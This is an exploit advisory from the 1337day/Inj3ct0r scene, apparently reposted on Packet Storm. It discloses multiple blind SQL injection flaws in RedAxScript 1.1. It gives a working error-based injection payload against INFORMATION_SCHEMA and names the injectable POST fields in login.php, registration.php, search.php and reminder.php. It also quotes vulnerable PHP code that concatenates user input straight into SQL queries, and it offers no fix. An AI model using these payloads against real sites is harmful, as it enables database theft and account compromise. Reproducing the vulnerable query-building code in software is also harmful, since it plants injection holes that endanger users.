RedAxScript version 1.1 suffers from multiple remote blind SQL injection vulnerabilities.
6b8f36199e8357cbfbdbc3b62976f84893ecd710c4ba586c66a459357a175c5e1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[>] Title : RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities
[>] Author : KedAns-Dz
[+] E-mail : ked-h (@hotmail.com / @1337day.com)
[+] FaCeb0ok : fb.me/Inj3ct0rK3d
[+] TwiTter : @kedans
[#] Platform : PHP / WebApp
[+] Cat/Tag : Multiple , SQL Injection , Blind SQLi
[<] <3 <3 Greetings t0 Palestine <3 <3
- Blind SQL Injection ( 'POST' Query and 'GET' the full 'Information_Schema' ):
AND (SELECT 8041 FROM(SELECT COUNT(*),CONCAT(0x3a6f79753a,(SELECT (CASE WHEN (8041=8041) THEN 1 ELSE 0 END)),0x3a70687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- POST Inject via HTTP headers attack's or HTTP debugger, HackBar / or use any toolkit like sqlmap, sql-ninja etc..
#### P.O.C [1] => in (login.php) | lines: ( 69 , 73.. 74) ##
****
$post_user = clean ($_POST['user'], 0);
$users_query = 'SELECT id, name, user, email, password, language, status, groups FROM ' . PREFIX . 'users WHERE user = \'' . $post_user . '\'';
mysql_query $users_result = mysql_query($users_query);
****
[+] POST Data on > : user=[ SQL Injection Here ]
############################################################
#### P.O.C [2] => in (registration.php) | lines: ( 59.. 62 , 142..156)
****
$r['email'] = clean ($_POST['email'], 3);
$r['user'] = clean ($_POST['user'], 0);
$r['name'] = clean ($_POST['name'], 0);
****
mysql_query mysql_query($query);
$query = 'INSERT INTO ' . PREFIX . 'users (' . $key_string . ') VALUES (' . $value_string . ')';
$key_string .= ', '; // if($last != $key),
$key_string .= $key;
foreach($r as $key=>$value)
$value_string .= '\'' . $value . '\'';
****
[+] go to registration and POST Data on > : ( email, user, name ) =>
email=-[ SQL Injection Here ]--&user=-[ SQL Injection Here ]--&name=-[ SQL Injection Here ]--
############################################################
#### P.O.C [3] => in (search.php) | lines: ( 47, 61, 70.. 82) ##
****
$search_terms = clean ($_POST['search_terms'], 1);
****
$query .= ')'; // if($search),
$query .= ' || '; // if($search), if($last != $key),
$query = 'SELECT id, title, alias, description, date, category, access FROM '...
foreach($search as $key=>$value) // if($search),
$search = array_filter(explode(' ', $search_terms));
****
mysql_query $result = mysql_query($query);
$query .= ' ORDER BY date DESC LIMIT 50';
****
[+] in Search area : POST Data on ( search_terms )
search_terms=[ SQL Injection Here ]
#### && Other Bug/Vulnerability in (reminder.php) when u do remind passwd :p
lines : ( 57 , & 80.. 85 )
[+] POST Data on > : ( email=[ SQLi ] )
## note : you can see befor any $_POST there is a function ' clean ' ( included clean.php )
but blind sqli attacks still workin' ,the clean func replace u'r input to alpha-num output just it
####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####
# 1337day.com id:[1337day-2013-21617]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed